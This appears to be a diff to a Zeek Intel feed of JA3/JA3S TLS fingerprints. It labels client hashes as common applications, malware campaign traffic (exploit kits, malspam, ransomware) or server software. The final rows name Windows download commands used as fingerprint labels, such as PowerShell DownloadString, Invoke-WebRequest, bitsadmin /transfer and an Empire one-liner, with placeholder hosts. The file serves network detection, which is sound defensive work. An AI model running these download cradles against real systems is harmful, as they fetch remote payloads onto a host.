+61d0d709fe7ac199ef4b2c52bc8cef75	Intel::JA3	ja3	firefox,thunderbird	F	-
+8498fe4268764dbf926a38283e9d3d8f	Intel::JA3	ja3	Franz,Google Chrome,Kiwi,Spotify,nwjs,Slack	F	-
+900c1fa84b4ea86537e1d148ee16eae8	Intel::JA3	ja3	Fuze	F	-
+107144b88827da5da9ed42d8776ccdc5	Intel::JA3	ja3	geod	F	-
+c46941d4de99445aef6b497679474cf4	Intel::JA3	ja3	geod	F	-
+002205d0f96c37c5e660b9f041363c11	Intel::JA3	ja3	Google Chrome	F	-
+073eede15b2a5a0302d823ecbd5ad15b	Intel::JA3	ja3	Google Chrome	F	-
+0b61c673ee71fe9ee725bd687c455809	Intel::JA3	ja3	Google Chrome	F	-
+6cd1b944f5885e2cfbe98a840b75eeb8	Intel::JA3	ja3	Google Chrome	F	-
+94c485bca29d5392be53f2b8cf7f4304	Intel::JA3	ja3	Google Chrome	F	-
+b4f4e6164f938870486578536fc1ffce	Intel::JA3	ja3	Google Chrome	F	-
+b8f81673c0e1d29908346f3bab892b9b	Intel::JA3	ja3	Google Chrome	F	-
+baaac9b6bf25ad098115c71c59d29e51	Intel::JA3	ja3	Google Chrome	F	-
+bc6c386f480ee97b9d9e52d472b772d8	Intel::JA3	ja3	Google Chrome	F	-
+da949afd9bd6df820730f8f171584a71	Intel::JA3	ja3	Google Chrome	F	-
+f58966d34ff9488a83797b55c804724d	Intel::JA3	ja3	Google Chrome	F	-
+fd6314b03413399e4f23d1524d206692	Intel::JA3	ja3	Google Chrome	F	-
+0e46737668fe75092919ee047a0b5945	Intel::JA3	ja3	Google Chrome Helper	F	-
+39fa85654105398ee7ef6a3a1c81d685	Intel::JA3	ja3	Google Chrome Helper	F	-
+4ba7b7022f5f5e1e500bb19199d8b1a4	Intel::JA3	ja3	Google Chrome Helper	F	-
+5498cef2cca704eb01cf2041cc1089c1	Intel::JA3	ja3	Google Chrome,Slack	F	-
+d27fb8deca6e3b9739db3fda2b229fe3	Intel::JA3	ja3	Google Drive File Stream	F	-
+ae340571b4fd0755c4a0821b18d8fa93	Intel::JA3	ja3	Google Earth	F	-
+f059212ce3de94b1e8253a7522cb1b44	Intel::JA3	ja3	Google Photos Backup	F	-
+fd10cc8cce9493a966c57249e074755f	Intel::JA3	ja3	gramblr	F	-
+3e860202fc555b939e83e7a7ab518c38	Intel::JA3	ja3	hola_svc	F	-
+54328bd36c14bd82ddaa0c04b25ed9ad	Intel::JA3	ja3	hola_svc	F	-
+56ac3a0bef0824c49e4b569941937088	Intel::JA3	ja3	hola_svc	F	-
+5c1c89f930122bccc7a97d52f73bea2c	Intel::JA3	ja3	hola_svc	F	-
+77310efe11f1943306ee317cf02150b7	Intel::JA3	ja3	hola_svc	F	-
+8bd59c4b7f3193db80fd64318429bcec	Intel::JA3	ja3	hola_svc	F	-
+d1f9f9b224387d2597f02095fcec96d7	Intel::JA3	ja3	hola_svc	F	-
+ff1040ba1e3d235855ef0d7cd9237fdc	Intel::JA3	ja3	hola_svc	F	-
+5af143afdbf58ec11ab3b3d53dd4e5e3	Intel::JA3	ja3	IDSyncDaemon	F	-
+d06acbe8ac31e753f40600a9d6717cba	Intel::JA3	ja3	Inbox OSX	F	-
+093081b45872912be9a1f2a8163fe041	Intel::JA3	ja3	java	F	-
+2080bf56cb87e64303e27fcd781e7efd	Intel::JA3	ja3	java	F	-
+225a24b45f0f1adbc2e245d4624c6e08	Intel::JA3	ja3	java	F	-
+3afe1fb5976d0999abe833b14b7d6485	Intel::JA3	ja3	java	F	-
+3b844830bfbb12eb5d2f8dc281d349a9	Intel::JA3	ja3	java	F	-
+51a7ad14509fd614c7bb3a50c4982b8c	Intel::JA3	ja3	java	F	-
+550628650380ff418de25d3d890e836e	Intel::JA3	ja3	java	F	-
+5b270b309ad8c6478586a15dece20a88	Intel::JA3	ja3	java	F	-
+5d7abe53ae15b4272a34f10431e06bf3	Intel::JA3	ja3	java	F	-
+7c7a68b96d2aab15d678497a12119f4f	Intel::JA3	ja3	java	F	-
+88afa0dea1608e28f50acbad32d7f195	Intel::JA3	ja3	java	F	-
+8ce6933b8c12ce931ca238e9420cc5dd	Intel::JA3	ja3	java	F	-
+a61299f9b501adcf680b9275d79d4ac6	Intel::JA3	ja3	java	F	-
+a9fead344bf3ac09f62df3cd9b22c268	Intel::JA3	ja3	java	F	-
+4056657a50a8a4e5cfac40ba48becfa2	Intel::JA3	ja3	java,eclipse	F	-
+f22bdd57e3a52de86cda40da2d84e83b	Intel::JA3	ja3	java,eclipse,Cyberduck	F	-
+028563cffc7a3a2e32090aee0294d636	Intel::JA3	ja3	java,eclipse,STS	F	-
+5f9b53f0d39dc9d940a3b5568fe5f0bb	Intel::JA3	ja3	java,JavaApplicationStub	F	-
+2db6873021f2a95daa7de0d93a1d1bf2	Intel::JA3	ja3	java,studio,eclipse	F	-
+c376061f96329e1020865a1dc726927d	Intel::JA3	ja3	JavaApplicationStub	F	-
+e516ad69a423f8e0407307aa7bfd6344	Intel::JA3	ja3	Kindle,stack,nextcloud	F	-
+3959d0a1344896e9fb5c0564ca0a2956	Intel::JA3	ja3	LeagueClientUx	F	-
+0fe51fa93812c2ebb50a655222a57bf2	Intel::JA3	ja3	LINE Messaging	F	-
+2e094913d88f0ad8dc69447cb7d2ce65	Intel::JA3	ja3	LINE Messaging	F	-
+193349d34561d1d5d1a270172eb2d97e	Intel::JA3	ja3	LogMeIn Client	F	-
+d732ca39155f38942f90e9fc2b0f97f7	Intel::JA3	ja3	Maxthon	F	-
+c9dbeed362a32f9a50a26f4d9b32bbd8	Intel::JA3	ja3	Messenger,Jumpshare	F	-
+6acb250ada693067812c3335705dae79	Intel::JA3	ja3	mono-sgen,Syncplicity,Axure RP 8,Amazon Drive	F	-
+3ee4aaac7147ff2b80ada31686db660c	Intel::JA3	ja3	node-webkit,Kindle	F	-
+641df9d6dbe7fdb74f70c8ad93def8cc	Intel::JA3	ja3	node.js	F	-
+9811c1bb9f0f6835d5c13a831cca4173	Intel::JA3	ja3	node.js	F	-
+106ecbd3d14b4dc6e413494263720afe	Intel::JA3	ja3	node.js,Postman,WhatsApp	F	-
+49de9b1c7e60bd3b8e1d4f7a49ba362e	Intel::JA3	ja3	nwjs,Chromium	F	-
+38cbe70b308f42da7c9980c0e1c89656	Intel::JA3	ja3	p4v,owncloud	F	-
+62448833d8230241227c03b7d441e31b	Intel::JA3	ja3	parsecd,apple.geod,apple.photomoments,photoanalysisd,FreedomProxy	F	-
+e846898acc767ebeb2b4388e58a968d4	Intel::JA3	ja3	postbox-bin	F	-
+a7823092705a5e91ce2b7f561b6e5b98	Intel::JA3	ja3	Qsync Client	F	-
+c048d9f26a79e11ca7276499ef24daf3	Intel::JA3	ja3	RescueTime,Plantronics Hub	F	-
+d219efd07cbb8fbe547e6a5335843f0f	Intel::JA3	ja3	ruby	F	-
+c36fb08942cf19508c08d96af22d4ffc	Intel::JA3	ja3	Safari	F	-
+844166382cc98d98595e6778c470f5d5	Intel::JA3	ja3	Salesforce Files	F	-
+49a341a21f4fd4ac63b027ff2b1a331f	Intel::JA3	ja3	Skype	F	-
+a5aa6e939e4770e3b8ac38ce414fd0d5	Intel::JA3	ja3	Slack	F	-
+116ffc8889873efad60457cd55eaf543	Intel::JA3	ja3	Spark	F	-
+8db4b0f8e9dd8f2fff38ee7c5a1e4496	Intel::JA3	ja3	SpotlightNetHelper,Safari	F	-
+39cf5b7a13a764494de562add874f016	Intel::JA3	ja3	Steam OSX	F	-
+2d3854d1cbcdceece83eabd85bdcc056	Intel::JA3	ja3	Tableau	F	-
+a585c632a2b49be1256881fb0c16c864	Intel::JA3	ja3	Tableau	F	-
+cd7c06b9459c9cfd4af2dba5696ea930	Intel::JA3	ja3	Tableau	F	-
+df65746370dcabc9b4f370c6e14a8156	Intel::JA3	ja3	True Key	F	-
+84071ea96fc8a60c55fc8a405e214c0f	Intel::JA3	ja3	Used by many desktop apps,Quip,Spotify,GitHub Desktop	F	-
+40fd0a5e81ebdcf0ec82a4710a12dec1	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+618ee2509ef52bf0b8216e1564eea909	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+799135475da362592a4be9199d258726	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+7b530a25af9016a9d12de5abc54d9e74	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+7e72698146290dd68239f788a452e7d8	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+a9aecaa66ad9c6cfe1c361da31768506	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+c05de18b01a054f2f6900ffe96b3da7a	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+c07cb55f88702033a8f52c046d23e0b2	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+e4d448cdfe06dc1243c1eb026c74ac9a	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+f1c5cf087b959cec31bd6285407f689a	Intel::JA3	ja3	Used by many programs on OSX,apple.WebKit.Networking	F	-
+488b6b601cb141b062d4da7f524b4b22	Intel::JA3	ja3	Used by many programs,Python,PHP,Git,dotnet,Adobe	F	-
+f28d34ce9e732f644de2350027d74c3f	Intel::JA3	ja3	Used by many programs,Quip,Aura,Spotify,Chatty	F	-
+190dfb280fe3b541acc6a2e5f00690e6	Intel::JA3	ja3	Used by many programs,Quip,Spotify,Dropbox,GitHub Desktop,etc	F	-
+20dd18bdd3209ea718989030a6f93364	Intel::JA3	ja3	Used by many programs,Slack,Postman,Spotify,Google Chrome	F	-
+e0224fc1c33658f2d3d963bfb0a76a85	Intel::JA3	ja3	Viber	F	-
+01319090aea981dde6fc8d6ae71ead54	Intel::JA3	ja3	vpnkit	F	-
+84607748f3887541dd60fe974a042c71	Intel::JA3	ja3	wineserver	F	-
+c2b4710c6888a5d47befe865c8e6fb19	Intel::JA3	ja3	ZwiftApp	F	-
+de350869b8c85de67a350c8d186f11e6	Intel::JA3	ja3	MW: angler-ek-malware-payload-sandbox-analysis-winxp, smoke-loader-post-infection-traffic	F	-
+2d8794cb7b52b777bee2695e79c15760	Intel::JA3	ja3	MW: eitest-rig-ek-traffic, cryptowall-phishing-malware-run-on-a-vm, hancitor-malspam-traffic-example, phishing-malware-analysis-from-malwr, phishing-malware-run-on-a-vm, unidentified-campaign-rig-ek-sends-deloader, hancitor-malspam-1st-run, hancitor-malspam-traffic	F	-
+a9da823fe77cd3df081644249edbf395	Intel::JA3	ja3	MW: angler-ek-traffic-02	F	-
+92579701f145605e9edc0b01a901c6d5	Intel::JA3	ja3	MW: usps-malspam-traffic-1-of-2, usps-malspam-js-file-post-infection-traffic	F	-
+bafc6b01eae6f4350f5db6805ace208e	Intel::JA3	ja3	MW: mordor-from-seahomevb.top, nd-run-hookads-rig-ek-sends-drembot-with-post-infection-traffic	F	-
+4d7a28d6f2263ed61de88ca66eb011e3	Intel::JA3	ja3	MW: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic	F	-
+1074895078955b2db60423ed2bf8ac23	Intel::JA3	ja3	MW: eitest-rig-ek-traffic, traffic-from-portuguese-malspam-attachment, eitest-script-for-tech-scam-after-amormariano.com.br-uk-based-traffic, eitest-fake-chrome-popup-leads-to-spora-ransomware, eitest-rig-ek-1st-run, cerber-ransomware-from-sunfloridjk.top-thru-fake-chrome-page, eitest-hoeflertext-chrome-popup-traffic-5-of-6, parking-service-malspam-traffic-1st-run, eitest-rig-ek-third-run, eitest-tech-support-scam, eitest-hoeflertext-chrome-popup-traffic-2-of-6, eitest-hoeflertext-chrome-popup-sends-spora-ransomware-1st-run, eitest-script-for-tech-scam-after-activaclinics.com-uk-based-traffic, eitest-hoeflertext-chrome-popup-sends-spora-ransomware-2nd-run, eitest-hoeflertext-chrome-popup-traffic-6-of-6, tech-support-scam-traffic, mole-ransomware-malspam-1st-attempt-on-a-vm, eitest-neutrino-ek-after-classical959.com, eitest-script-for-tech-scam-after-intothebluefishing.com-uk-based-traffic, eitest-hoeflertext-chrome-popup-traffic-3-of-6, boleto-malspam-traffic, eitest-hoeflertext-chrome-popup-traffic-2nd-run	F	-
+294b2f1dc22c6e6c3231d2fe311d504b	Intel::JA3	ja3	MW: trickbot-malspam-traffic	F	-
+e107ef8ec0296e17c3f82de949b4066c	Intel::JA3	ja3	MW: neutrino-traffic	F	-
+df5c30e670dba99f9270ed36060cf054	Intel::JA3	ja3	MW: fake-font-update-for-firefox	F	-
+83e04bc58d402f9633983cbf22724b02	Intel::JA3	ja3	MW: eitest-hoeflertext-chrome-popup-after-techydiary.com, eitest-hoeflertext-chrome-popup-after-expervision.com, eitest-hoeflertext-chrome-popup-traffic-1-of-6, eitest-hoeflertext-chrome-popup-traffic-4-of-6, eitest-hoeflertext-chrome-popup-sends-spora-ransomware-4th-run, eitest-hoeflertext-chrome-popup-sends-spora-ransomware-3rd-run	F	-
+c1fbfd09bd0bab610be60dd6819688f4	Intel::JA3	ja3	MW: fiesta-ek-infection-traffic	F	-
+bff2c7b5c666331bfe9afacefd1bdb51	Intel::JA3	ja3	MW: eitest-angler-ek-third-run	F	-
+df8bfc363eeba63ab938cb2190ccd7b7	Intel::JA3	ja3	MW: rig-ek-sends-kovter-2nd-run, rig-ek-sends-kovter-1st-run, dridex-malspam-traffic-example	F	-
+74927e242d6c3febf8cb9cab10a7f889	Intel::JA3	ja3	MW: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic	F	-
+10ee8d30a5d01c042afd7b2b205facc4	Intel::JA3	ja3	MW: banking-phish-traffic	F	-
+e7d705a3286e19ea42f587b344ee6865	Intel::JA3	ja3	MW: malspam-traffic	F	-
+ff94b48f555edc2f0a4c8256eb0d81de	Intel::JA3	ja3	MW: eitest-angler-ek-third-run	F	-
+243a279e5aaae8841edf46d00c05195e	Intel::JA3	ja3	MW: malspam-traffic	F	-
+2db6873021f2a95daa7de0d93a1d1bf2	Intel::JA3	ja3	MW: java-update-traffic-edited	F	-
+85c420ab089dac5025034444789a8fb5	Intel::JA3	ja3	MW: angler-ek-traffic-02	F	-
+aeae3901ecde8396b2f5648c02aeb37f	Intel::JA3	ja3	MW: neutrino-traffic	F	-
+94c485bca29d5392be53f2b8cf7f4304	Intel::JA3	ja3	MW: eitest-campaign-hoeflertext-popup-traffic, whatsapp-malspam-1st-run, boleto-malspam-link-from-pdf-attachment, whatsapp-malspam-2nd-run, eitest-hoeflertext-popup-from-canadoodles.com	F	-
+2d44457ca7a1e0e754664c8469ce62a8	Intel::JA3	ja3	MW: eitest-rig-ek-second-example	F	-
+0ffee3ba8e615ad22535e7f771690a28	Intel::JA3	ja3	MW: fake-font-update-for-firefox	F	-
+51b5c918558a4bfb50ce1ab1d5fddff7	Intel::JA3	ja3	MW: neutrino-traffic	F	-
+6f702efe6480d2a1c9f85b73b8a4794a	Intel::JA3	ja3	MW: usps-malspam-traffic-1-of-2, usps-malspam-js-file-post-infection-traffic	F	-
+a0e9f5d64349fb13191bc781f81f42e1	Intel::JA3	ja3	MW: fake-font-update-for-firefox	F	-
+1be3ecebe5aa9d3654e6e703d81f6928	Intel::JA3	ja3	MW: nuclear-ek-traffic, malspam-traffic	F	-
+c6e36d272db78ba559429e3d845606d1	Intel::JA3	ja3	MW: neutrino-ek-after-mu-media.co.uk, realstatistics-gate-neutrino-ek-sends-gootkit-after-nebularoficial.com, post-infection-traffic-for-gootkit-malware-from-eitest-neutrino-ek, example-of-gootkit-post-infection-traffic, eitest-angler-ek-first-run-post-infection-traffic-gootkit, st-run-gootkit-post-infection-traffic	F	-
+fd6bbdf835788b3c7d33372127470a06	Intel::JA3	ja3	MW: neutrino-traffic	F	-
+4f635262ad3fb6e634daee798082c788	Intel::JA3	ja3	MW: boleto-malspam-infection-traffic	F	-
+2a458dd9c65afbcf591cd8c2a194b804	Intel::JA3	ja3	MW: eitest-rig-ek-second-example, phishing-malware-run-on-a-vm, contract-malspam-traffic, globeimposter-malspam-traffic	F	-
+6734f37431670b3ab4292b8f60f29984	Intel::JA3	ja3	MW: trickbot-infection-from-usdata.estoreseller.com, malspam-infection-traffic, upatre-malspam-infection-traffic, fedex-malspam-sends-kovter, trickbot-infection-from-carriereiter.com.exe, kovter-nemucodaes-malspam-traffic, necurs-botnet-malspam-pushes-trickbot, kovter-nemucod-malspam-traffic, angler-ek-traffic, trickbot-malspam-traffic, trickbot-infection-from-carriereiserphotography.com, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, trickbot-malspam-traffic-example, trickbot-infection-from-carriereiter.com, nuclear-ek-traffic, kovter-locky-malspam-traffic	F	-
+2201d8e006f8f005a6b415f61e677532	Intel::JA3	ja3	MW: blackhole-ek-traffic, sweet-orange-ek-post-infection-traffic, sweet-orange-ek-traffic, styx-ek-traffic	F	-
+96eba628dcb2b47607192ba74a3b55ba	Intel::JA3	ja3	MW: angler-ek-traffic-01	F	-
+2efb07037a97b06201ab4fe7ec0c326e	Intel::JA3	ja3	MW: fake-font-update-for-firefox	F	-
+1848357994c2851c809cb01bae7d631c	Intel::JA3	ja3	MW: rig-ek-traffic	F	-
+187dfde7edc8ceddccd3deeccc21daeb	Intel::JA3	ja3	MW: java-based-rat-malspam-traffic	F	-
+51a7ad14509fd614c7bb3a50c4982b8c	Intel::JA3	ja3	MW: sweet-orange-ek-traffic, styx-ek-traffic, magnitude-ek-traffic, java-update-traffic-edited, neutrino-and-nuclear-ek-traffic, flashpack-ek-traffic, sibhost-ek-traffic, nuclear-ek-traffic	F	-
+3fab5d0fe3b2408c8b2251b46d3895de	Intel::JA3	ja3	MW: usps-malspam-traffic-1-of-2, usps-malspam-js-file-post-infection-traffic	F	-
+85bedfc1914da556aab4518390798003	Intel::JA3	ja3	MW: dridex-infection-traffic	F	-
+1d095e68489d3c535297cd8dffb06cb9	Intel::JA3	ja3	MW: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic	F	-
+5182f54f9c6e99d117d9dde3fa2b4cff	Intel::JA3	ja3	MW: zeuspandabanker-malspam-traffic	F	-
+d54b3eb800cbeccf99fd5d5cdcd7b5b5	Intel::JA3	ja3	MW: usps-malspam-js-file-post-infection-traffic	F	-
+e9273590c7875d6367325f8714890790	Intel::JA3	ja3	MW: boleto-malspam-traffic	F	-
+cbcd1d81f242de31fd683d5acbc70dca	Intel::JA3	ja3	MW: eitest-angler-ek-traffic	F	-
+fd2273056f386e0ba8004e897c337037	Intel::JA3	ja3	MW: nuclear-ek-traffic, malspam-traffic	F	-
+a7dfa1673bb090cab6b6658861f43473	Intel::JA3	ja3	MW: neutrino-traffic	F	-
+098f55e27d8c4b0a590102cbdb3a5f3a	Intel::JA3	ja3	MW: eitest-hoeflertext-chrome-popup-traffic-4-of-6	F	-
+3b483d0b34894548b602e8d18cdc24c5	Intel::JA3	ja3	MW: eitest-rig-ek-3rd-run, rig-ek-sends-cerber-ransomware-after-southcoastdrones.com.au, boleto-malspam-infection-traffic, eitest-rig-ek-sends-vawtrak, eitest-rig-ek-5th-run, malspam-traffic	F	-
+d55e755245ac118f2b1847c1c57b5e03	Intel::JA3	ja3	MW: angler-ek-traffic-02	F	-
+852e7534b3f722d893a7750afb5ecdcc	Intel::JA3	ja3	MW: neutrino-traffic	F	-
+c201b92f8b483fa388be174d6689f534	Intel::JA3	ja3	MW: dhl-malspam-traffic, st-run-hookads-rig-ek, eitest-rig-ek-sends-dreambot, traffic-from-malspam-pushing-dreambot, nd-run-hookads-rig-ek-sends-dreambot, nd-run-hookads-rig-ek-sends-drembot-with-post-infection-traffic, japanese-malspam-pushing-ursnif-traffic, nd-run-hookads-rig-ek, nd-run-hookads-rig-ek-sends-dreambot-with-post-infection-traffic, st-run-hookads-rig-ek-sends-dreambot, th-run-hookads-rig-ek-sends-dreambot	F	-
+67f762b0ffe3aad00dfdb0e4b1acd8b5	Intel::JA3	ja3	MW: dyre-phishing-run-traffic, upatre-dyre-infection-traffic, phishing-email-traffic, upatre-dyre-malspam-infecting-a-vm, upatre-dyre-malspam-traffic, ups-themed-kovter-malspam-traffic	F	-
+b898351eb5e266aefd3723d466935494	Intel::JA3	ja3	JA3S: Apache 2.4.18 Ubuntu 16.04	F	-
+7bee5c1d424b7e5f943b06983bb11422	Intel::JA3	ja3	JA3S: Apache 2.4.18 Ubuntu 16.04	F	-
+f93a0b1f80e58bc666e2efad32108aa2	Intel::JA3	ja3	JA3S: ESF/Golfe2 Google Static	F	-
+965ecee2ef1d30d9cf7f26ed94c52e3d	Intel::JA3	ja3	JA3S: ESF/Golfe2 Google Static	F	-
+9a31479427499ded4d3656a260298ec7	Intel::JA3	ja3	JA3S: NGINX unknown ver	F	-
+02096378b3237b7e4b9a2cd08715cf34	Intel::JA3	ja3	JA3S: NGINX unknown ver	F	-
+860fcf58fd757e26aa8911e5eaff6b53	Intel::JA3	ja3	JA3S: GitHub.com	F	-
+af90ea6d911dbfbfea950c0fe512e8c4	Intel::JA3	ja3	JA3S: GitHub.com	F	-
+d552d00679649fd11b6def3e9bdf2429	Intel::JA3	ja3	JA3S: Akamai Static	F	-
+cbb432e9f6c8c1093ca5bb0639db1f66	Intel::JA3	ja3	JA3S: OpenResty BigCommerce	F	-
+8f41a697eff27e008f969cf7b5ba4117	Intel::JA3	ja3	Chrome/71.0.3578.80 Linux 64-bit	F	-
+334da95730484a993c6063e36bc90a47	Intel::JA3	ja3	Firefox/64.0 Linux 64-bit	F	-
+13cc575f247730d3eeb8ff01e76b245f	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 4.0,Command:Invoke-WebRequest https://[domain]	F	-
+5e12c14bda47ac941fc4e8e80d0e536f	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 4.0,Command:Invoke-WebRequest https://[IP]	F	-
+5e12c14bda47ac941fc4e8e80d0e536f	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 4.0,Command:PowerShell empire oneliner using System.Net.WebClient	F	-
+2c14bfb3f8a2067fbc88d8345e9f97f3	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:BitsAdmin,Command:bitsadmin /transfer debjob /download /priority normal https://[domain]/ c:\Users\Administrator\temp	F	-
+613e01474d42ebe48ef52dff6a20f079	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:BitsAdmin,Command:bitsadmin /transfer debjob /download /priority normal https://[IP]/ c:\Users\Administrator\temp	F	-
+13cc575f247730d3eeb8ff01e76b245f	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 4.0,Command:$wc.DownloadString(https://[domain]/)	F	-
+5e12c14bda47ac941fc4e8e80d0e536f	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 4.0,Command:$wc.DownloadString(https://[IP]/)	F	-
+2c14bfb3f8a2067fbc88d8345e9f97f3	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 6.0,Command:Invoke-WebRequest https://[domain]	F	-
+613e01474d42ebe48ef52dff6a20f079	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 6.0,Command:Invoke-WebRequest https://[IP]	F	-
+2c14bfb3f8a2067fbc88d8345e9f97f3	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 5.0 (System.Net.WebClient),Command:$wc.DownloadString(https://[domain]/)	F	-
+613e01474d42ebe48ef52dff6a20f079	Intel::JA3	ja3	OS:Windows Server 2012RT,Software:PowerShell 5.0 (System.Net.WebClient),Command:$wc.DownloadString(https://[IP]/)	F	-
+05af1f5ca1b87cc9cc9b25185115607d	Intel::JA3	ja3	OS:Windows 7 64 bit enterprise,Software:PowerShell 5.0,Command:Invoke-WebRequest https://[domain]	F	-
+8c4a22651d328568ec66382a84fc505f	Intel::JA3	ja3	OS:Windows 7 64 bit enterprise,Software:PowerShell 5.0,Command:Invoke-WebRequest https://[IP]	F	-
+05af1f5ca1b87cc9cc9b25185115607d	Intel::JA3	ja3	OS:Windows 7 64 bit enterprise,Software:PowerShell 5.0 (System.Net.WebClient),Command:$wc.DownloadString(https://[domain]/)	F	-
+8c4a22651d328568ec66382a84fc505f	Intel::JA3	ja3	OS:Windows 7 64 bit enterprise,Software:PowerShell 5.0 (System.Net.WebClient),Command:$wc.DownloadString(https://[IP]/)	F	-
+05af1f5ca1b87cc9cc9b25185115607d	Intel::JA3	ja3	OS:Windows 7 64 bit enterprise,Software:BitsAdmin,Command:bitsadmin /transfer debjob /download /priority normal https://[domain]/ c:\Users\Administrator\temp	F	-
+8c4a22651d328568ec66382a84fc505f	Intel::JA3	ja3	OS:Windows 7 64 bit enterprise,Software:BitsAdmin,Command:bitsadmin /transfer debjob /download /priority normal https://[IP]/ c:\Users\Administrator\temp	F	-
+235a856727c14dba889ddee0a38dd2f2	Intel::JA3	ja3	OS:Server 2016,Software:PowerShell 5.1,Command:Invoke-WebRequest https://[domain]	F	-
+17b69de9188f4c205a00fe5ae9c1151f	Intel::JA3	ja3	OS:Server 2016,Software:PowerShell 5.1,Command:Invoke-WebRequest https://[IP]	F	-
+d0ec4b50a944b182fc10ff51f883ccf7	Intel::JA3	ja3	OS:Server 2016,Software:BitsAdmin (Microsoft BITS/7.8),Command:bitsadmin /transfer debjob /download /priority normal https://[domain]/ c:\Users\Administrator\temp	F	-
+294b2f1dc22c6e6c3231d2fe311d504b	Intel::JA3	ja3	OS:Server 2016,Software:BitsAdmin (Microsoft BITS/7.8),Command:bitsadmin /transfer debjob /download /priority normal https://[IP]/ c:\Users\Administrator\temp	F	-
